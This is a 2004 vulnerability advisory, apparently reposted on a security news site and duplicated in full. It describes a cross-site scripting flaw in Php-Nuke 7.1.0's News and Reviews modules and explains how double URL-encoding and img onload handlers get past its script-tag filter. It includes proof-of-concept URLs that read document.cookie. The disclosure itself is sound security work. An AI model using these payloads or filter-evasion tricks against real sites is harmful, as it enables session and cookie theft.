HNS MAIN FEEDMALWARE
New worm affecting corporate networks Tales from the support crypt: infected DVD drives, antiviruses that blow fuses and more Rogue antivirus applications related to Continental Flight 1404 and other current news Zero-day Web malware blocks surpass yearly average New password-stealing application disguised as a Firefox plugin 
Php-Nuke 7.1.0 Cross Site Scripting Vulnerability
18 August 2004
From: Abu Lafy <off(at)hotmail.com>
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Php-Nuke is popular freeware content management system, written in php by Francisco Burzi. This CMS (COntent Management System) is used on many thousands websites, because it`s free of charge, easy to install and has broad set of features.
Homepage: http://phpnuke.org
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If we look at Php-Nuke`s history, then we can find many cases reporting the XSS in Php-Nuke. Most of them are fixed by now, when we have allready version 7.1.0 available. Despite this I found two new cases of XSS in Php-Nuke 6.x-7.1.0 , maybe in older versions too.
Exploit:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Let`s look at code from "/modules/News/friend.php" line 84-92 (Php-Nuke 7.1.0):
function StorySent($title, $fname) {
include ("header.php");
$title = urldecode($title);
$fname = urldecode($fname);
OpenTable();
echo "<center><font class=\"content\">"._FSTORY." <b>$title</b> "._HASSENT."
$fname... "._THANKS."</font></center>"; CloseTable();
include ("footer.php");
}
If we deliver $title or $fname by GET or POST variable, then we have XSS conditions here. But Php-Nuke will reject GET and POST requests with <script> tags. One way to evade this filter is the using of <img src=foo onload=[code here]>.
There is better way to exploit the XSS, and it`s the using of partially or fully urlencoded ("hexed") script for exploit. And because we have lines
$title = urldecode($title);
and
$fname = urldecode($fname);
in original code, it will be urldecoded and will work for us, but GET or POST filtering can`t recognize the "<script>" pattern.
Same problem has one more module - "Reviews".
Proof of concept examples:
http://f00bar.com/modules.php?name=News&file=friend&op=StorySent&title=%253cscript>ale
rt%2528document.cookie);%253c/script>
http://f00bar.com/modules.php?name=Reviews&rop=postcomment&title=%253cscript>alert%252
8document.cookie);%253c/script>
==================
Abu Lafy
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Php-Nuke is popular freeware content management system, written in php by Francisco Burzi. This CMS (COntent Management System) is used on many thousands websites, because it`s free of charge, easy to install and has broad set of features.
Homepage: http://phpnuke.org
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If we look at Php-Nuke`s history, then we can find many cases reporting the XSS in Php-Nuke. Most of them are fixed by now, when we have allready version 7.1.0 available. Despite this I found two new cases of XSS in Php-Nuke 6.x-7.1.0 , maybe in older versions too.
Exploit:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Let`s look at code from "/modules/News/friend.php" line 84-92 (Php-Nuke 7.1.0):
function StorySent($title, $fname) {
include ("header.php");
$title = urldecode($title);
$fname = urldecode($fname);
OpenTable();
echo "<center><font class=\"content\">"._FSTORY." <b>$title</b> "._HASSENT."
$fname... "._THANKS."</font></center>"; CloseTable();
include ("footer.php");
}
If we deliver $title or $fname by GET or POST variable, then we have XSS conditions here. But Php-Nuke will reject GET and POST requests with <script> tags. One way to evade this filter is the using of <img src=foo onload=[code here]>.
There is better way to exploit the XSS, and it`s the using of partially or fully urlencoded ("hexed") script for exploit. And because we have lines
$title = urldecode($title);
and
$fname = urldecode($fname);
in original code, it will be urldecoded and will work for us, but GET or POST filtering can`t recognize the "<script>" pattern.
Same problem has one more module - "Reviews".
Proof of concept examples:
http://f00bar.com/modules.php?name=News&file=friend&op=StorySent&title=%253cscript>ale
rt%2528document.cookie);%253c/script>
http://f00bar.com/modules.php?name=Reviews&rop=postcomment&title=%253cscript>alert%252
8document.cookie);%253c/script>
==================
Abu Lafy
